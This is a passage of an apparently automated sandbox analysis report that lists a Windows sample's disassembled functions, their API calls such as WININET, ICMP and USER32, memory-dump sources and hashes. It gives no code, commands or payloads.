                                                                                          • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                          • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                          Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                          • HttpQueryInfoW.WININET ref: 0044A892
                                                                                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3705125965-3916222277
                                                                                          • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                          • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                          • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                          • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                          Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                          • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                          • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                          • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                          Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyWindow
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 3375834691-2298589950
                                                                                          • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                          • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                          • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                          • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                          Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                          • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MoveWindow
                                                                                          • String ID: Listbox
                                                                                          • API String ID: 3315199576-2633736733
                                                                                          • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                          • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                          • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                          • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                          Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: HH
                                                                                          • API String ID: 2507767853-2761332787
                                                                                          • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                          • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                          • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                          • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                          Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: HH
                                                                                          • API String ID: 2507767853-2761332787
                                                                                          • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                          • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                          • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                          • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                          Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: msctls_trackbar32
                                                                                          • API String ID: 3850602802-1010561917
                                                                                          • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                          • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                          • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                          • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                          Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                          • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                          • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                          • String ID: HH
                                                                                          • API String ID: 1515696956-2761332787
                                                                                          • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                          • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                          • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                          • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                          Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                          • DrawMenuBar.USER32 ref: 00449828
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                                          • String ID: 0
                                                                                          • API String ID: 772068139-4108050209
                                                                                          • Opcode ID: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
                                                                                          • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                          • Opcode Fuzzy Hash: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
                                                                                          • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                          Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocTask_wcslen
                                                                                          • String ID: hkG
                                                                                          • API String ID: 2651040394-3610518997
                                                                                          • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                          • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                          • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                          • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                          Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                          • API String ID: 2574300362-1816364905
                                                                                          • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                          • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                          • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                          • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                          Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                                          • API String ID: 2574300362-58917771
                                                                                          • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                          • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                          • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                          • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                          Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                          • API String ID: 2574300362-3530519716
                                                                                          • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                          • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                          • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                          • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                          Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                                          • API String ID: 2574300362-275556492
                                                                                          • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                          • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                          • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                          • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                          Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
                                                                                          • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                          • Opcode Fuzzy Hash: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
                                                                                          • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                          Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __flush.LIBCMT ref: 00414630
                                                                                          • __fileno.LIBCMT ref: 00414650
                                                                                          • __locking.LIBCMT ref: 00414657
                                                                                          • __flsbuf.LIBCMT ref: 00414682
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
